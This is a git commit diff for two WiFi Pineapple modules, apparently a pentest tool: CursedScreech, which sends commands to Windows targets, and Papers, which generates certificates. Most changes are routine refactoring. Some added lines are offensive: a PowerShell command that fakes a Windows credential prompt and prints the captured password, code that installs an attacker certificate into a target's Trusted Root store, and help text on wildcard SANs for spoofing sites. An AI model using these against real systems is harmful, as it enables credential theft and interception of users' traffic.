Papers, CursedScreech, and Portal Auth Updates (#5)
parent
e7e15afdcb
commit
1f4f1248a7
|
@ -64,6 +64,9 @@ if (!empty($_FILES)) {
|
|||
class CursedScreech extends Module {
|
||||
public function route() {
|
||||
switch ($this->request->action) {
|
||||
case 'init':
|
||||
$this->init();
|
||||
break;
|
||||
case 'depends':
|
||||
$this->depends($this->request->task);
|
||||
break;
|
||||
|
@ -140,6 +143,27 @@ class CursedScreech extends Module {
|
|||
}
|
||||
}
|
||||
|
||||
/* ============================ */
|
||||
/* INIT FUNCTIONS */
|
||||
/* ============================ */
|
||||
|
||||
private function init() {
|
||||
if (!file_exists(__LOGS__)) {
|
||||
if (!mkdir(__LOGS__, 0755, true)) {
|
||||
$this->respond(false, "Failed to create logs directory");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
if (!file_exists(__API_DL__)) {
|
||||
if (!mkdir(__API_DL__, 0755, true)) {
|
||||
$this->logError("Failed init", "Failed to initialize because the API download directory structure could not be created.");
|
||||
$this->respond(false);
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* ============================ */
|
||||
/* DEPENDS FUNCTIONS */
|
||||
/* ============================ */
|
||||
|
@ -422,7 +446,7 @@ class CursedScreech extends Module {
|
|||
$files = scandir(__API_DL__);
|
||||
$success = true;
|
||||
foreach ($files as $file) {
|
||||
if ($file == "." || $file == "..") {continue;}
|
||||
if (substr($file, 0, 1) == ".") {continue;}
|
||||
if (!unlink(__API_DL__ . $file)) {
|
||||
$success = false;
|
||||
}
|
||||
|
@ -449,7 +473,7 @@ class CursedScreech extends Module {
|
|||
$files = [];
|
||||
|
||||
foreach (scandir(__PAYLOADS__) as $file) {
|
||||
if ($file == "." || $file == "..") {continue;}
|
||||
if (substr($file, 0, 1) == ".") {continue;}
|
||||
$files[$file] = __PAYLOADS__;
|
||||
}
|
||||
$this->respond(true, null, $files);
|
||||
|
@ -521,7 +545,7 @@ class CursedScreech extends Module {
|
|||
$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
|
||||
$contents = array();
|
||||
foreach (scandir($dir) as $log) {
|
||||
if ($log == "." || $log == "..") {continue;}
|
||||
if (substr($log, 0, 1) == ".") {continue;}
|
||||
array_push($contents, $log);
|
||||
}
|
||||
$this->respond(true, null, $contents);
|
||||
|
@ -575,7 +599,7 @@ class CursedScreech extends Module {
|
|||
$keys = scandir($dir);
|
||||
$certs = array();
|
||||
foreach ($keys as $key) {
|
||||
if ($key == "." || $key == "..") {continue;}
|
||||
if (substr($key, 0, 1) == ".") {continue;}
|
||||
|
||||
$parts = explode(".", $key);
|
||||
$fname = $parts[0];
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
January 5, 2018
|
||||
<br /><br />
|
||||
- Modified hook into Papers to work with the latest release<br />
|
||||
- Added ability to install a certificate on a target Windows machine<br />
|
||||
|
|
@ -1,4 +1,5 @@
|
|||
Send File:C:\Temp\
|
||||
Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
|
||||
Get PS Version:powershell "$PSVersionTable"
|
||||
Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
|
||||
Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
|
||||
|
|
|
@ -14,7 +14,7 @@ with open(settingsFile, "r") as sFile:
|
|||
if params[0] == "activity_log":
|
||||
activity_log = params[1]
|
||||
elif params[0] == "kuro_key":
|
||||
priv_key = params[1] + ".pem"
|
||||
priv_key = params[1] + ".key"
|
||||
pub_cer = params[1] + ".cer"
|
||||
elif params[0] == "target_key":
|
||||
client_key = params[1] + ".cer"
|
||||
|
|
|
@ -23,7 +23,7 @@ while [ "$#" -gt 0 ]
|
|||
do
|
||||
|
||||
if [[ "$1" == "-k" ]]; then
|
||||
KEY="$2.pem"
|
||||
KEY="$2.key"
|
||||
fi
|
||||
if [[ "$1" == "-d" ]]; then
|
||||
KEYDIR="$2"
|
||||
|
|
|
@ -51,6 +51,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
$scope.newCmdName = "";
|
||||
$scope.newCmdCommand = "";
|
||||
$scope.checkAllTargets = false;
|
||||
$scope.target_installKey = "";
|
||||
$scope.certStores = [
|
||||
{"ID":"Root", "Name":"Trusted Root Certification Authorities"},
|
||||
{"ID":"My", "Name":"Personal"},
|
||||
{"ID":"Remote Desktop", "Name":"Remote Desktop"},
|
||||
{"ID":"Trust", "Name":"Enterprise Trust"},
|
||||
{"ID":"CA", "Name":"Intermediate Certification Authorities"},
|
||||
{"ID":"SmartCardRoot", "Name":"Smart Card Trusted Roots"},
|
||||
{"ID":"TrustedPublisher", "Name":"Trusted Publishers"},
|
||||
{"ID":"TrustedPeople", "Name":"Trusted People"},
|
||||
{"ID":"ClientAuthIssuer", "Name":"Client Authentication Issuers"},
|
||||
{"ID":"eSIM Certification Authorities", "Name":"eSIM Certification Authorities"},
|
||||
{"ID":"Windows Live ID Token Issuer", "Name":"Windows Live ID Token Issuer"},
|
||||
{"ID":"Homegroup Machine Certificates", "Name":"Homegroup Machine Certificates"}
|
||||
];
|
||||
$scope.selectedCertStore = $scope.certStores[0];
|
||||
|
||||
// Panes
|
||||
$scope.showTargetPane = true;
|
||||
|
@ -62,6 +78,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
$scope.uploading = false;
|
||||
$scope.selectedPayload = "";
|
||||
$scope.showPayloadSelect = false;
|
||||
$scope.showCertSelect = false;
|
||||
|
||||
// Interval vars
|
||||
$scope.stop;
|
||||
|
@ -313,15 +330,33 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
if ($scope.showPayloadSelect) {
|
||||
// ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\"
|
||||
cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand;
|
||||
} else if ($scope.showCertSelect) {
|
||||
cmd = "sendfile;" + $scope.target_installKey + ";" + getEZCmd("Send File");
|
||||
} else {
|
||||
cmd = $scope.targetCommand;
|
||||
}
|
||||
$api.request({
|
||||
module: 'CursedScreech',
|
||||
action: 'sendCommand',
|
||||
command: cmd,
|
||||
targets: checkedTargets
|
||||
},function(response){
|
||||
|
||||
// Make a second API call to install the certificate
|
||||
if ($scope.showCertSelect) {
|
||||
|
||||
cmd = $scope.targetCommand.replace("$cert", getEZCmd("Send File") + $scope.target_installKey.split("/").slice(-1)[0]).replace("$store", "'Cert:\\LocalMachine\\" + $scope.selectedCertStore.ID + "'")
|
||||
|
||||
$api.request({
|
||||
module: 'CursedScreech',
|
||||
action: 'sendCommand',
|
||||
command: cmd,
|
||||
targets: checkedTargets
|
||||
},function(response){});
|
||||
|
||||
}
|
||||
|
||||
});
|
||||
});
|
||||
|
||||
function getTargetIndex(sock){
|
||||
|
@ -458,23 +493,27 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
});
|
||||
|
||||
$scope.ezCommandChange = (function(){
|
||||
$scope.showPayloadSelect = false;
|
||||
$scope.showCertSelect = false;
|
||||
if ($scope.selectedCmd === null) {
|
||||
$scope.targetCommand = "";
|
||||
$scope.showPayloadSelect = false;
|
||||
return;
|
||||
}
|
||||
for (key in $scope.ezcmds) {
|
||||
if ($scope.ezcmds[key] == $scope.selectedCmd) {
|
||||
if (key == "Send File") {
|
||||
$scope.showPayloadSelect = true;
|
||||
} else {
|
||||
$scope.showPayloadSelect = false;
|
||||
} else if (key == "Install Cert") {
|
||||
$scope.showCertSelect = true;
|
||||
}
|
||||
}
|
||||
}
|
||||
$scope.targetCommand = $scope.selectedCmd;
|
||||
});
|
||||
|
||||
function getEZCmd(key) {
|
||||
return $scope.ezcmds[key];
|
||||
}
|
||||
|
||||
/* ============================================= */
|
||||
/* BEGIN KEY FUNCTIONS */
|
||||
|
@ -484,9 +523,15 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
if (type == "kuro") {
|
||||
$scope.selectKuroKey = true;
|
||||
$scope.selectTargetKey = false;
|
||||
$scope.selectInstallKey = false;
|
||||
} else if (type == "target") {
|
||||
$scope.selectTargetKey = true;
|
||||
$scope.selectKuroKey = false;
|
||||
$scope.selectInstallKey = false;
|
||||
} else if (type == "install") {
|
||||
$scope.selectInstallKey = true;
|
||||
$scope.selectKuroKey = false;
|
||||
$scope.selectTargetKey = false;
|
||||
}
|
||||
$api.request({
|
||||
module: 'CursedScreech',
|
||||
|
@ -509,6 +554,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
$scope.settings_kuroKey = keyPath;
|
||||
} else if ($scope.selectTargetKey == true) {
|
||||
$scope.settings_targetKey = keyPath;
|
||||
} else if ($scope.selectInstallKey == true) {
|
||||
$scope.target_installKey = keyPath + ".cer";
|
||||
}
|
||||
});
|
||||
|
||||
|
@ -636,7 +683,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
$http.post("/modules/CursedScreech/api/module.php", fd, {
|
||||
transformRequest: angular.identity,
|
||||
headers: {'Content-Type': undefined}
|
||||
}).success(function(response) {
|
||||
}).then(function(response) {
|
||||
for (var key in response) {
|
||||
if (response.hasOwnProperty(key)) {
|
||||
if (response.key == "Failed") {
|
||||
|
@ -711,6 +758,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
|
|||
$scope.stop = undefined;
|
||||
});
|
||||
|
||||
$scope.init = (function(){
|
||||
$api.request({
|
||||
module: 'CursedScreech',
|
||||
action: 'init'
|
||||
},function(response){
|
||||
if (response.success == false) {
|
||||
if (response.message != '') {
|
||||
$scope.getLogs();
|
||||
} else {
|
||||
alert(response.message);
|
||||
}
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
$scope.init();
|
||||
$scope.loadAvailableInterfaces();
|
||||
$scope.loadSettings();
|
||||
$scope.loadEZCmds();
|
||||
|
|
|
@ -234,14 +234,27 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
|
|||
<option value="" selected>Select...</option>
|
||||
</select>
|
||||
<br />
|
||||
<div ng-show="showPayloadSelect">
|
||||
<div ng-show="showPayloadSelect" ng-hide="!showPayloadSelect">
|
||||
<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedPayload" ng-options="payload.fileName for payload in payloads">
|
||||
<option value="" disabled selected>Select Payload...</option>
|
||||
</select>
|
||||
<br />
|
||||
<h4>Remote upload path</h4>
|
||||
</div>
|
||||
<input type="text" ng-model="targetCommand" class="form-control block" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
|
||||
<div ng-show="showCertSelect" ng-hide="!showCertSelect">
|
||||
<div class="row form-group">
|
||||
<div class="col-md-6">
|
||||
<input type="text" ng-model="target_installKey" class="form-control" placeholder="Select Certificate...">
|
||||
</div>
|
||||
<div class="col-md-2">
|
||||
<button type="button" class="btn btn-sm" data-toggle="modal" data-target="#cs_keyModal" ng-click="loadCertificates('install');">SSL Store</button>
|
||||
</div>
|
||||
</div>
|
||||
<h4>Certificate Store</h4>
|
||||
<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedCertStore" ng-options="store.Name for store in certStores">
|
||||
</select>
|
||||
</div>
|
||||
<input type="text" ng-model="targetCommand" class="form-control block" ng-show="!showCertSelect" ng-hide="showCertSelect" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
|
||||
<table style="width: 100%">
|
||||
<tr><td>
|
||||
<button type="button" class="btn btn-sm cs_hoverInfo" style="width: 100px;" ng-disabled="kuroButton=='Start'" ng-click="sendCommand();">Send</button>
|
||||
|
@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
|
|||
<tbody>
|
||||
<tr ng-repeat="(key, value) in ezcmds">
|
||||
<td>
|
||||
<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
|
||||
<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File' || key == 'Install Cert'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
|
||||
</td>
|
||||
<td style="width: 200px">
|
||||
<label class="form-label">{{ key }}</label>
|
||||
|
|
|
@ -6,5 +6,5 @@
|
|||
"tetra"
|
||||
],
|
||||
"title": "CursedScreech",
|
||||
"version": "1.2"
|
||||
"version": "1.3"
|
||||
}
|
|
@ -10,11 +10,10 @@ define('__CHANGELOGS__', __INCLUDES__ . "changelog/");
|
|||
define('__HELPFILES__', __INCLUDES__ . "help/");
|
||||
define('__DOWNLOAD__', __INCLUDES__ . "download/");
|
||||
define('__UPLOAD__', __INCLUDES__ . "upload/");
|
||||
define('__SSL_TEMPLATE__', __SCRIPTS__ . "ssl.cnf");
|
||||
|
||||
/*
|
||||
Determine the type of file that has been uploaded and move it to the appropriate
|
||||
directory. If it's a .zip it is an injection set and will be unpacked. If it is
|
||||
an .exe it will be moved to __WINDL__, etc.
|
||||
Import keys
|
||||
*/
|
||||
if (!empty($_FILES)) {
|
||||
$response = [];
|
||||
|
@ -55,6 +54,9 @@ class Papers extends Module
|
|||
{
|
||||
public function route() {
|
||||
switch ($this->request->action) {
|
||||
case 'init':
|
||||
$this->init();
|
||||
break;
|
||||
case 'checkDepends':
|
||||
$this->checkDepends();
|
||||
break;
|
||||
|
@ -105,6 +107,38 @@ class Papers extends Module
|
|||
break;
|
||||
}
|
||||
}
|
||||
private function init() {
|
||||
if (!file_exists(__LOGS__)) {
|
||||
if (!mkdir(__LOGS__, 0755, true)) {
|
||||
$this->respond(false, "Failed to create logs directory");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
if (!file_exists(__DOWNLOAD__)) {
|
||||
if (!mkdir(__DOWNLOAD__, 0755, true)) {
|
||||
Papers::logError("Failed init", "Failed to initialize because the 'download' directory structure could not be created");
|
||||
$this->respond(false);
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
if (!file_exists(__SSLSTORE__)) {
|
||||
if (!mkdir(__SSLSTORE__, 0755, true)) {
|
||||
Papers::logError("Failed init", "Failed to initialize because the 'ssl store' directory structure could not be created");
|
||||
$this->respond(false);
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
if (!file_exists(__SSHSTORE__)) {
|
||||
if (!mkdir(__SSHSTORE__, 0755, true)) {
|
||||
Papers::logError("Failed init", "Failed to initialize because the 'ssh store' directory structure could not be created");
|
||||
$this->respond(false);
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
private function checkDepends() {
|
||||
$retData = array();
|
||||
exec(__SCRIPTS__ . "checkDepends.sh", $retData);
|
||||
|
@ -159,6 +193,7 @@ class Papers extends Module
|
|||
}
|
||||
private function buildCert($paramsObj) {
|
||||
$certInfo = array();
|
||||
$req = array();
|
||||
$params = (array)$paramsObj;
|
||||
|
||||
$keyName = (array_key_exists('keyName', $params)) ? $params['keyName'] : "newCert";
|
||||
|
@ -174,28 +209,21 @@ class Papers extends Module
|
|||
if (array_key_exists('bitSize', $params)) {
|
||||
$certInfo['-b'] = $params['bitSize'];
|
||||
}
|
||||
if (array_key_exists('country', $params)) {
|
||||
$certInfo['-c'] = $params['country'];
|
||||
}
|
||||
if (array_key_exists('state', $params)) {
|
||||
$certInfo['-st'] = $params['state'];
|
||||
}
|
||||
if (array_key_exists('city', $params)) {
|
||||
$certInfo['-l'] = $params['city'];
|
||||
}
|
||||
if (array_key_exists('organization', $params)) {
|
||||
$certInfo['-o'] = $params['organization'];
|
||||
}
|
||||
if (array_key_exists('section', $params)) {
|
||||
$certInfo['-ou'] = $params['section'];
|
||||
}
|
||||
if (array_key_exists('commonName', $params)) {
|
||||
$certInfo['-cn'] = $params['commonName'];
|
||||
}
|
||||
if (array_key_exists('email', $params)) {
|
||||
$certInfo['-email'] = $params['email'];
|
||||
|
||||
$req[':C:'] = array_key_exists('country', $params) ? $params['country'] : "US";
|
||||
$req[':ST:'] = array_key_exists('state', $params) ? $params['state'] : "CA";
|
||||
$req[':LOC:'] = array_key_exists('city', $params) ? $params['city'] : "San Jose";
|
||||
$req[':ORG:'] = array_key_exists('organization', $params) ? $params['organization'] : "SecTrust";
|
||||
$req[':OU:'] = array_key_exists('section', $params) ? $params['section'] : "Certificate Issue";
|
||||
$req[':COM:'] = array_key_exists('commonName', $params) ? $params['commonName'] : $keyName;
|
||||
|
||||
if (array_key_exists('sans', $params)) {
|
||||
$req[':SAN:'] = $params['sans'];
|
||||
}
|
||||
|
||||
// Generate an OpenSSL config file
|
||||
$certInfo['--config'] = $this->generateSSLConfig($keyName, $req);
|
||||
|
||||
// Build the argument string to pass to buildCert.sh
|
||||
foreach ($certInfo as $k => $v) {
|
||||
$argString .= $k . " \"" . $v . "\" ";
|
||||
|
@ -211,6 +239,9 @@ class Papers extends Module
|
|||
return;
|
||||
}
|
||||
|
||||
// Delete the OpenSSL conf file
|
||||
unlink($certInfo['--config']);
|
||||
|
||||
if (array_key_exists('container', $params) || array_key_exists('encrypt', $params)) {
|
||||
$cryptInfo = array();
|
||||
$argString = "";
|
||||
|
@ -257,6 +288,39 @@ class Papers extends Module
|
|||
$this->respond(true, "Keys created successfully!");
|
||||
}
|
||||
|
||||
/*
|
||||
Generates an OpenSSL config file based on the passed in requirements ($req)
|
||||
and returns the path to the file.
|
||||
*/
|
||||
private function generateSSLConfig($keyName, $req) {
|
||||
$conf = file_get_contents(__SSL_TEMPLATE__);
|
||||
|
||||
foreach ($req as $k => $v) {
|
||||
$conf = str_replace($k, $v, $conf);
|
||||
}
|
||||
|
||||
// Add the common name as a SAN
|
||||
$conf .= "\nDNS.1 = " . $req[':COM:'];
|
||||
|
||||
// Add additional SANs if they were provided
|
||||
if (isset($req[':SAN:'])) {
|
||||
$x = 2;
|
||||
foreach (explode(",", $req[':SAN:']) as $san) {
|
||||
|
||||
// Skip the common name if it was included in the list since
|
||||
// we already added it above
|
||||
if ($san == $req[':COM:']) { continue; }
|
||||
|
||||
$conf .= "\nDNS." . $x . " = " . $san;
|
||||
$x++;
|
||||
}
|
||||
}
|
||||
|
||||
$path = __SCRIPTS__ . hash('md5', $keyName . time()) . ".cnf";
|
||||
file_put_contents($path, $conf);
|
||||
return $path;
|
||||
}
|
||||
|
||||
private function loadCertificates() {
|
||||
$certs = $this->getKeys(__SSLSTORE__);
|
||||
$certs = array_merge($certs, $this->getKeys(__SSHSTORE__));
|
||||
|
@ -268,7 +332,7 @@ class Papers extends Module
|
|||
$keys = scandir($dir);
|
||||
$certs = array();
|
||||
foreach ($keys as $key) {
|
||||
if ($key == "." || $key == "..") {continue;}
|
||||
if (substr($key, 0, 1) == ".") {continue;}
|
||||
|
||||
$parts = explode(".", $key);
|
||||
$fname = $parts[0];
|
||||
|
@ -323,7 +387,7 @@ class Papers extends Module
|
|||
$contents = scandir($keyDir);
|
||||
$certs = array();
|
||||
foreach ($contents as $cert) {
|
||||
if ($cert == "." || $cert == "..") {continue;}
|
||||
if (substr($cert, 0, 1) == ".") {continue;}
|
||||
$parts = explode(".", $cert);
|
||||
$fname = $parts[0];
|
||||
$type = "." . $parts[1];
|
||||
|
@ -356,7 +420,7 @@ class Papers extends Module
|
|||
|
||||
private function clearDownloadArchive() {
|
||||
foreach (scandir(__DOWNLOAD__) as $file) {
|
||||
if ($file == "." || $file == "..") {continue;}
|
||||
if (substr($file, 0, 1) == ".") {continue;}
|
||||
unlink(__DOWNLOAD__ . $file);
|
||||
}
|
||||
$files = glob(__DOWNLOAD__ . "*");
|
||||
|
@ -380,7 +444,7 @@ class Papers extends Module
|
|||
$msg = "Failed to delete the following files:";
|
||||
$keyDir = ($keyType == "SSH") ? __SSHSTORE__ : __SSLSTORE__;
|
||||
foreach (scandir($keyDir) as $cert) {
|
||||
if ($cert == "." || $cert == "..") {continue;}
|
||||
if (substr($cert, 0, 1) == ".") {continue;}
|
||||
if (explode(".",$cert)[0] == $delCert) {
|
||||
if (!unlink($keyDir . $cert)) {
|
||||
$res = False;
|
||||
|
@ -527,7 +591,7 @@ class Papers extends Module
|
|||
$dir = ($type == "error") ? __LOGS__ : __CHANGELOGS__;
|
||||
$contents = array();
|
||||
foreach (scandir($dir) as $log) {
|
||||
if ($log == "." || $log == "..") {continue;}
|
||||
if (substr($log, 0, 1) == ".") {continue;}
|
||||
array_push($contents, $log);
|
||||
}
|
||||
$this->respond(true, null, $contents);
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
January 3, 2018<br /></br >
|
||||
- Added option to include SANs in certificates<br />
|
||||
- Changed key output from .pem to .key<br />
|
||||
- Added default Certificate Info if none is included in the build request<br />
|
||||
- Fixed a bug where the Certificate Info fields remained after switching to SSH key build mode<br />
|
|
@ -20,7 +20,12 @@ This value indicates how long the certificate will be valid. A default value of
|
|||
|
||||
|
||||
<strong>Signature Algorithm</strong><br />
|
||||
SHA-1 is considered to be too weak these days, or it will be soon enough, so SHA-256 is selected by default.
|
||||
SHA-1 has officially been broken so SHA-256 is selected by default.
|
||||
<br /><br />
|
||||
|
||||
|
||||
<strong>Subject Alternative Names (SAN)</strong><br />
|
||||
A comma-delimited list of SANs. These are alternative names that will be considered valid when verifying the certificate. For example if you're spoofing multiple sites during a pentest you'll want to add SANs (*.company1.com, *.company2.com, *.com).
|
||||
<br /><br />
|
||||
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@ help() {
|
|||
echo -e '\t-o,--orgnaization:\t\tOrganization';
|
||||
echo -e '\t-ou,--organizationalUnit:\tOrganizational Unit';
|
||||
echo -e '\t-cn,--commonName:\t\tCommon Name';
|
||||
echo -e '\t-email,--emailAddress:\t\tEmail Address';
|
||||
echo -e '\t--config:\t\t\tOpenSSL config file';
|
||||
echo '';
|
||||
}
|
||||
|
||||
|
@ -70,8 +70,8 @@ fi
|
|||
if [[ "$1" == "-cn" || "$1" == "--commonName" ]]; then
|
||||
CN="$2"
|
||||
fi
|
||||
if [[ "$1" == "-email" || "$1" == "--emailAddress" ]]; then
|
||||
EMAIL="$2"
|
||||
if [[ "$1" == "--config" ]]; then
|
||||
CONF="$2"
|
||||
fi
|
||||
|
||||
shift
|
||||
|
@ -104,14 +104,11 @@ fi
|
|||
if [ -n "$CN" ]; then
|
||||
subj="$subj/CN=$CN";
|
||||
fi
|
||||
if [ -n "$EMAIL" ]; then
|
||||
subj="$subj/emailAddress=$EMAIL";
|
||||
fi
|
||||
|
||||
if [ -n "$subj" ]; then
|
||||
openssl req -x509 -nodes -batch -days $DAYS -newkey rsa:$BITSIZE -$SIGALGO -keyout $ssl_store$KEYNAME.pem -out $ssl_store$KEYNAME.cer -subj "$subj";
|
||||
openssl req -x509 -nodes -batch -days $DAYS -newkey rsa:$BITSIZE -$SIGALGO -keyout $ssl_store$KEYNAME.key -out $ssl_store$KEYNAME.cer -subj "$subj";
|
||||
else
|
||||
openssl req -x509 -nodes -batch -days $DAYS -newkey rsa:$BITSIZE -$SIGALGO -keyout $ssl_store$KEYNAME.pem -out $ssl_store$KEYNAME.cer;
|
||||
openssl req -x509 -nodes -batch -days $DAYS -newkey rsa:$BITSIZE -$SIGALGO -keyout $ssl_store$KEYNAME.key -out $ssl_store$KEYNAME.cer -config $CONF;
|
||||
fi
|
||||
|
||||
echo "Complete";
|
||||
|
|
|
@ -15,7 +15,7 @@ class ConfigHelper:
|
|||
|
||||
|
||||
def checkSSLCertsExist(self):
|
||||
flags = [".pem", ".cer"]
|
||||
flags = [".key", ".cer"]
|
||||
if os.path.isdir(self.ssl_dir):
|
||||
for file in os.listdir(self.ssl_dir):
|
||||
for flag in flags:
|
||||
|
@ -64,7 +64,7 @@ class ConfigHelper:
|
|||
|
||||
index = 0
|
||||
cert = keyName + ".cer"
|
||||
key = keyName + ".pem"
|
||||
key = keyName + ".key"
|
||||
|
||||
with open(self.nginxConf, "w") as out:
|
||||
for line in self.lines:
|
||||
|
@ -84,7 +84,7 @@ class ConfigHelper:
|
|||
|
||||
def replaceSSLConfig(self, newKey):
|
||||
cert = newKey + ".cer"
|
||||
key = newKey + ".pem"
|
||||
key = newKey + ".key"
|
||||
currentKey = self.currentSSLCerts[0].rsplit(".")[0]
|
||||
index = 0
|
||||
|
||||
|
@ -94,7 +94,7 @@ class ConfigHelper:
|
|||
if (currentKey + ".cer") in line:
|
||||
line = "\t\tssl_certificate /etc/nginx/ssl/" + cert + ";\n"
|
||||
|
||||
if (currentKey + ".pem") in line:
|
||||
if (currentKey + ".key") in line:
|
||||
line = "\t\tssl_certificate_key /etc/nginx/ssl/" + key + ";\n"
|
||||
|
||||
index = index + 1
|
||||
|
|
|
@ -3,8 +3,8 @@
|
|||
# Author: sud0nick
|
||||
# Date: Jan 2016
|
||||
|
||||
if ! cp $1.pem /etc/nginx/ssl/; then
|
||||
echo "Failed to copy $1.pem to /etc/nginx/ssl/";
|
||||
if ! cp $1.key /etc/nginx/ssl/; then
|
||||
echo "Failed to copy $1.key to /etc/nginx/ssl/";
|
||||
fi
|
||||
|
||||
if ! cp $1.cer /etc/nginx/ssl/; then
|
||||
|
|
|
@ -90,7 +90,7 @@ done;
|
|||
|
||||
# Generate a password on the private key
|
||||
if [ $ENCRYPT_KEYS = true ]; then
|
||||
openssl rsa -$ALGO -in $ssl_store$KEY.pem -out $ssl_store$KEY.pem -passout pass:"$PASS";
|
||||
openssl rsa -$ALGO -in $ssl_store$KEY.key -out $ssl_store$KEY.key -passout pass:"$PASS";
|
||||
fi
|
||||
|
||||
# If a container type is present but not an algo or pass then use
|
||||
|
@ -104,7 +104,7 @@ if [ -n "$CONTAINER" ]; then
|
|||
fi
|
||||
|
||||
# Generate a container for the public and private keys
|
||||
openssl $CONTAINER -$CALGO -export -nodes -out $ssl_store$KEY.pfx -inkey $ssl_store$KEY.pem -in $ssl_store$KEY.cer -passin pass:"$PASS" -passout pass:"$CPASS";
|
||||
openssl $CONTAINER -$CALGO -export -nodes -out $ssl_store$KEY.pfx -inkey $ssl_store$KEY.key -in $ssl_store$KEY.cer -passin pass:"$PASS" -passout pass:"$CPASS";
|
||||
fi
|
||||
|
||||
echo "Complete"
|
||||
|
|
|
@ -55,5 +55,5 @@ if [[ -z $KEYNAME ]]; then
|
|||
exit;
|
||||
fi
|
||||
|
||||
ssh-keygen -q -b $BITSIZE -t rsa -N "$PASSWORD" -f $SSH_STORE$KEYNAME.pem -C $COMMENT
|
||||
mv $SSH_STORE$KEYNAME.pem.pub $SSH_STORE$KEYNAME.pub
|
||||
ssh-keygen -q -b $BITSIZE -t rsa -N "$PASSWORD" -f $SSH_STORE$KEYNAME.key -C $COMMENT
|
||||
mv $SSH_STORE$KEYNAME.key.pub $SSH_STORE$KEYNAME.pub
|
||||
|
|
|
@ -11,7 +11,7 @@ while read p; do
|
|||
IN_SERVER_BLOCK=true;
|
||||
fi
|
||||
else
|
||||
if [[ $p == *".cer;" || $p == *".pem;" ]]; then
|
||||
if [[ $p == *".cer;" || $p == *".key;" ]]; then
|
||||
echo $p | cut -d '/' -f 5 | tr -d ';';
|
||||
fi
|
||||
fi
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
[req]
|
||||
prompt = no
|
||||
distinguished_name = req_distinguished_name
|
||||
x509_extensions = req_ext
|
||||
|
||||
[req_distinguished_name]
|
||||
organizationName = :ORG:
|
||||
organizationalUnitName = :OU:
|
||||
localityName = :LOC:
|
||||
stateOrProvinceName = :ST:
|
||||
countryName = :C:
|
||||
commonName = :COM:
|
||||
|
||||
[req_ext]
|
||||
subjectAltName = @alt_names
|
||||
|
||||
[alt_names]
|
|
@ -23,7 +23,7 @@ while [ "$#" -gt 0 ]
|
|||
do
|
||||
|
||||
if [[ "$1" == "-k" ]]; then
|
||||
KEY="$2.pem"
|
||||
KEY="$2.key"
|
||||
fi
|
||||
if [[ "$1" == "-d" ]]; then
|
||||
KEYDIR="$2"
|
||||
|
|
|
@ -39,14 +39,14 @@ output=$(unzip $FILE.zip -d $DL_DIR);
|
|||
# keys are destined for the SSH directory
|
||||
if [[ $output == *".pub"* ]]; then
|
||||
mv $FILE.pub /pineapple/modules/Papers/includes/ssh/
|
||||
mv $FILE.pem /pineapple/modules/Papers/includes/ssh/
|
||||
mv $FILE.key /pineapple/modules/Papers/includes/ssh/
|
||||
fi
|
||||
|
||||
# If the archive contained a .cer these
|
||||
# keys are destined for the SSL directory
|
||||
if [[ $output == *".cer"* ]]; then
|
||||
mv $FILE.cer /pineapple/modules/Papers/includes/ssl/
|
||||
mv $FILE.pem /pineapple/modules/Papers/includes/ssl/
|
||||
mv $FILE.key /pineapple/modules/Papers/includes/ssl/
|
||||
fi
|
||||
|
||||
# Clear the download directory
|
||||
|
|
|
@ -5,6 +5,7 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
$scope.certBitSize = "2048";
|
||||
$scope.certDaysValid = "365";
|
||||
$scope.certSigAlgo = "sha256";
|
||||
$scope.certSANs = "";
|
||||
$scope.certKeyName = "";
|
||||
$scope.modifyCertInfo = false;
|
||||
$scope.certInfoCountry = "";
|
||||
|
@ -130,6 +131,9 @@ registerController('PapersController', ['$api', '$scope', '$sce', '$http', funct
|
|||
if ($scope.certDaysValid != ''){
|
||||
